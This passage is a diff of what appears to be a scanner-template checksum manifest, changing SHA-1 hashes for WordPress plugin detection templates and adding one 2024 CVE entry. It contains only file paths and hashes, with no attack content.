helpers/wordpress/plugins/loginpress.txt:5f022945150b402cb3e470acc3818847b3dc5e00 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:6f8941ad5d1dfeb1e4d4a276b9ad1dbce8a7cc0d -helpers/wordpress/plugins/mailpoet.txt:5a69b31dc00045596a99a27b106a7326f6d44297 +helpers/wordpress/plugins/mailpoet.txt:f0d3f51cd4c60530c28aa8e602a5056b1a376c94 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:218d96849acd4f3914538408fbb4a3dca66ff25c helpers/wordpress/plugins/malcare-security.txt:eb5ffc0342cb0113a96a05c48dd1c79f3aa9174b @@ -3532,6 +3532,7 @@ http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6366.yaml:13d57831fba2fd50976e1e01e8048ff76767e4a9 +http/cves/2024/CVE-2024-6396.yaml:f6d4a643effb2e2a64d15f2c940ca4b7d15e1557 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 @@ -5870,7 +5871,7 @@ http/misconfiguration/linkerd-ssrf-detect.yaml:66aaed4e25760830722d077aecd0fc09d http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3bc8297db1bcd http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 -http/misconfiguration/manage-cabinet-register.yaml:a989a9340ac6793375a7ed535e09172244823538 +http/misconfiguration/manage-cabinet-register.yaml:e1fa885f636fc0f2c1822932a22bf1afce0c33ae http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:bc55398c10b87bc6a5c507b4710e3462b264f935 http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 @@ -7340,230 +7341,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:e20237d3bfd7a6174e79fd4dffa8c53321df7615 -http/technologies/wordpress/plugins/add-to-any.yaml:7f9321df072f8cedf8d3e8a7edb56555c26826ec -http/technologies/wordpress/plugins/admin-menu-editor.yaml:b2927c35bef5ca8b557a385b64d3bd9a2535f4f1 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9afc9564525618ae1132bd1ef4eb255984952fd5 -http/technologies/wordpress/plugins/akismet.yaml:52b4510535ae905f3c4e28ef77690820d5fbf064 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:deedc83a02743be6f79b13cf0945ced6d97fe7fd -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:20a52cdc8748d24232f853f6213aa871b00b7aff -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:81650697a4550b59951b5fd2907abd306884a2f5 -http/technologies/wordpress/plugins/amp.yaml:750534d23116d63c9bc3c63d4135de0d77714728 -http/technologies/wordpress/plugins/antispam-bee.yaml:9628ef28b9e6e005c8deb971f531e488348b0c72 -http/technologies/wordpress/plugins/astra-sites.yaml:6cbdc6d7ff5d9128df27dc88824e34860b59a738 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:2dfcbbcf51184f268e3d233dad538dc71e0632eb -http/technologies/wordpress/plugins/backwpup.yaml:f111161dbb10b6c48d139f500a100f84f8f5de45 -http/technologies/wordpress/plugins/better-search-replace.yaml:8d5e9e1ab3fe229e48b9199c3f29c6d097f5f9dd -http/technologies/wordpress/plugins/better-wp-security.yaml:3b2067eb3584f35673d03b9871925cad425c3924 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9ac7d0e47add85b5c6490795d1a1adfd6352e6dd -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:35b7683860f1afcf542f04881bcb426dcee9bdbf -http/technologies/wordpress/plugins/breeze.yaml:08aea601c63fbb16e61bda531258d44c5b370a5f -http/technologies/wordpress/plugins/broken-link-checker.yaml:a1034cc504d92d14c3b351635735aa6c79a689df -http/technologies/wordpress/plugins/chaty.yaml:d6dbe760204db337b9e37d4de671dafbec313666 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:a0d87b9f9327f7f552ff5b68f4e9288c07bb29c2 -http/technologies/wordpress/plugins/classic-editor.yaml:852c0e262b0fe48b353f31af1182874e10201b16 -http/technologies/wordpress/plugins/classic-widgets.yaml:78165320e78261a5f8eb79be59d95509ee10ce80 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:53ef134128afffd88fd41d52c27b61da3a042180 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:9154be9c94ad075935ba7d5f2cfe7d7c99805182 -http/technologies/wordpress/plugins/coblocks.yaml:ac8a238f04c4fe87d15f8edc135ec1b00b1d5d63 -http/technologies/wordpress/plugins/code-snippets.yaml:80f4c90d6a5c3f170f7dc8bddc927b1d73fb9c73 -http/technologies/wordpress/plugins/coming-soon.yaml:9ecb9124ff6ea31e692b75018d22473817f84639 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:8b5034cd56884e71b957ff249ca7447ada92fdb6 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:d96222fc7723deb266c563657f8dcc0e4340d20e -http/technologies/wordpress/plugins/contact-form-7.yaml:95bf050af59853efad627554442b1df7bf401331 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:8390191faf3c89f43be661920ee91e75a32b0cb6 -http/technologies/wordpress/plugins/cookie-law-info.yaml:058cd08dec576b15dbac5cf53ac1e3f8cf91a779 -http/technologies/wordpress/plugins/cookie-notice.yaml:6badbbf4cf9e77e824c1399297dd937900907fcf -http/technologies/wordpress/plugins/copy-delete-posts.yaml:d4948da97036a3d09d5ecfbd48f8387c6111ca49 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:648d662380914dfb6b8c59f2b0c77ea4a57645d1 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:57808a83856bcadac499a394681ca4e373392017 -http/technologies/wordpress/plugins/custom-css-js.yaml:1bae0a39cb0e3b698f16e6482bb08611c5b1c001 -http/technologies/wordpress/plugins/custom-fonts.yaml:b55e17b99f7de0d26f9aabb3ab304a2925486bc3 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:0080b7172788e3689fc63f1e7eeec3742f7d6c4b -http/technologies/wordpress/plugins/disable-comments.yaml:3968e7274d217dba7c12df49a5d2d7d0b4557602 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:73d91061d9bee789bf7994de50dd86100c0c80d9 -http/technologies/wordpress/plugins/duplicate-page.yaml:709f9913c81ce4881cce92c898d1550698143f80 -http/technologies/wordpress/plugins/duplicate-post.yaml:e173cf59ea2a562350ef9f3f61f87a01713d9e93 -http/technologies/wordpress/plugins/duplicator.yaml:42ef75011be7eb0795cfca96f2c51aab3e8a037a -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:3ae7fd78e0c03c4a4cc5e8bd8bfbfe235875158a +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:83464d2fdb4f04ce5643498df4281407a8e18b9f -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:49cd1f5002494f55277de656f62177588dcc06fb -http/technologies/wordpress/plugins/elementor.yaml:3793963da3754af4f11209443ed070b8a5110183 -http/technologies/wordpress/plugins/elementskit-lite.yaml:8e97e3c841e8b552fe677a319979db0c2cbcdeb9 -http/technologies/wordpress/plugins/enable-media-replace.yaml:f8e87b39a02fd669f5ce21d4901a7f44a4b92eb4 -http/technologies/wordpress/plugins/envato-elements.yaml:34a0e52e686b98e2323d53eaf5f4847481153005 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:94c6e42b8e5e568a8a12b121d9f8b8d7f8f45834 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:815a5c3a73d89c630ff8e388e1919d5937b2a49c -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:a62dd83c227f8895b2e81ae85391e4892f418b3b -http/technologies/wordpress/plugins/fast-indexing-api.yaml:1443269b706ab4721e9c61d88542c003bc34120f -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:eea2e759fb846d05ccf1ac4191022cb456a680f7 -http/technologies/wordpress/plugins/flamingo.yaml:455c5ed9e67cf34cf15d1dde34b59b5a6feb401e -http/technologies/wordpress/plugins/fluent-smtp.yaml:5e227d1cbc0a0ac43348c15c82035a2d64f28e1b -http/technologies/wordpress/plugins/fluentform.yaml:a19fd76f29dba55ace7d906dc05f8473840131e3 -http/technologies/wordpress/plugins/font-awesome.yaml:c52895a887e05605b4e59916fc512c33ecfc9ca0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:596ac21aba107adeb4f8e379def48ed8138a4b1a -http/technologies/wordpress/plugins/formidable.yaml:31bbfeb89d3e21deead71e45ed93f0cdc0d6e8b2 -http/technologies/wordpress/plugins/forminator.yaml:c2b6de18d9d4726bf43781ab9f99335141d32dde -http/technologies/wordpress/plugins/ga-google-analytics.yaml:04d83fa1190c7edaae8c60fcc3ca0121f6b0ad93 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:001c8227162964482df4a8724c2fa5220718ca48 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:cd0390ae750501cb806d7aad737a7d4f73f89a4d -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:d53eeaaecc834b4d576e6f3fec35e28f7a41462c -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:002897db5e19ff75922b42411db65f2cf25c7e2b -http/technologies/wordpress/plugins/google-site-kit.yaml:efae16b7112bdd56e9f01c13a6410e25bad68bf5 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:7f6d887e121995c2d81e00fde5e74ce2c98d7fa0 -http/technologies/wordpress/plugins/gtranslate.yaml:8f74075e99d1b483b674ff8e72b3d3d0e5cf37cb -http/technologies/wordpress/plugins/gutenberg.yaml:27e216e2de3fe6934be3cbbdc062e511d94a32a8 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:e29e095a72910b4435dcdff3f639354e17318c91 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:4d5df67a0f543a6be68388330140a873b06d924d -http/technologies/wordpress/plugins/header-footer-elementor.yaml:e7b8572ceb08a4a379b50bfab52f612504aa3666 -http/technologies/wordpress/plugins/header-footer.yaml:357167288c70fda211e2e8a6cbe4d5351a6d197d -http/technologies/wordpress/plugins/health-check.yaml:f0e817556f9fc941e3b106f68f84d02b2643e761 -http/technologies/wordpress/plugins/hello-dolly.yaml:abdfd9b5e05a74600bde15188a669791ba78237e -http/technologies/wordpress/plugins/host-webfonts-local.yaml:60861e8d9457bcbddfee9d9b0bf9c20f4feed4ce -http/technologies/wordpress/plugins/hostinger.yaml:31a805f5f0b8013fa1b3367ca3e1b75a546e355c -http/technologies/wordpress/plugins/image-optimization.yaml:dde68abc946776ee9500214d90bdae62a15d5ded -http/technologies/wordpress/plugins/imagify.yaml:4ef5b36c0c5346b70c57ad9107df3bac7415ec27 -http/technologies/wordpress/plugins/imsanity.yaml:0dbb5a395fe263068942847896ed62a9066bc30a -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:63a2e28edce247bb6de8111debf9d25bd606eed1 -http/technologies/wordpress/plugins/instagram-feed.yaml:69a7af64c4fdbdefca5dac9344be016f3715585a -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:717045d8d74a0f1965b5efb1c483e45f29b780aa +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:aa50d5d2cf10f2040c9992a2c9e0d54468c7773d +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:6051a62a49864cea51e88ca95adc92a1a0882d2d -http/technologies/wordpress/plugins/jetpack.yaml:2e82e269a28f99566d2dcbeeecd46e8108fb5690 -http/technologies/wordpress/plugins/kadence-blocks.yaml:7cd4d89f4927c6d1e5224c59d868adc664e0abd5 -http/technologies/wordpress/plugins/kirki.yaml:ecf2a74e1a0a77fa1adedf55644a9ac4d3c83b03 -http/technologies/wordpress/plugins/leadin.yaml:8018631a6693093d6c2a045ac15cb7f5aa846782 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fef2f746c24fe22ad8255ff56e82140b3fd9d946 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:e9c6bf50c8fc125304b2f1cf00d8818b7eb4486d -http/technologies/wordpress/plugins/litespeed-cache.yaml:a8ea1efb86ceedb4002af5221ccf7938ce5a808d -http/technologies/wordpress/plugins/loco-translate.yaml:a99eb18a9f78e59020cb05f103c7056b2a858e43 -http/technologies/wordpress/plugins/loginizer.yaml:1533c99f85c8669c787ca3e8ab43b736ffa4735e +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:4a1a0b7d6de1be76b2ad5d83b1a7c5c7fc09eba6 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:ff6c07875acd1fa35e729871368325ea4af603b2 -http/technologies/wordpress/plugins/mailpoet.yaml:850706101b58c93231711ceae5c657724bdb0f6f -http/technologies/wordpress/plugins/maintenance.yaml:ccb42f98b3fd8f9c94820f045165b1d3f608cf8f -http/technologies/wordpress/plugins/mainwp-child.yaml:9b45e1670066de93fa901be9690545eb8a835125 -http/technologies/wordpress/plugins/malcare-security.yaml:b4f6a23bbed26246040958130fec5c1f2fff3e7c -http/technologies/wordpress/plugins/megamenu.yaml:071810e22223dbb36e800f2f833d861887308b8e -http/technologies/wordpress/plugins/members.yaml:b2ba628d81f06963681405fdba7401328b0cd10a -http/technologies/wordpress/plugins/meta-box.yaml:281b43d6045be658f3fb737861ad098bbffce60e -http/technologies/wordpress/plugins/metform.yaml:3307b619fd7d922857b8480ad5895e3cffbcb510 -http/technologies/wordpress/plugins/ml-slider.yaml:e6780ead466b9d0faca788dca24eb9ff80c2a79b -http/technologies/wordpress/plugins/newsletter.yaml:59ca7787eba7ef3e0630e42b47c1f117ac718c65 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:2b3bf1da2781b6d5489bb848258731dd6c7a80f2 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:de6af013bf635b33a5457356c2fa4e06567b6397 -http/technologies/wordpress/plugins/ninja-forms.yaml:f47916cc4077c5a4858aeeb16fd184d1ef2b203d -http/technologies/wordpress/plugins/ocean-extra.yaml:f4f53c0f79ec20a655a9b7be94e59491429a4786 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:aac0132f3b06c50698630ef15b7e068e97d21888 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:cfedbe863e0c085669a971411a81fd23dfdb705d -http/technologies/wordpress/plugins/optinmonster.yaml:c84ad185351f756d8426e3bd521f475e3b25d6cd -http/technologies/wordpress/plugins/otter-blocks.yaml:dc06cd67f15be23056da0e38a5348e0b6d26a2f3 -http/technologies/wordpress/plugins/password-protected.yaml:7aa66d6ad347464d5ee8ba417b2b6230717789c0 -http/technologies/wordpress/plugins/pdf-embedder.yaml:26ae2c587204b22054c49582c879c0edef94974c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 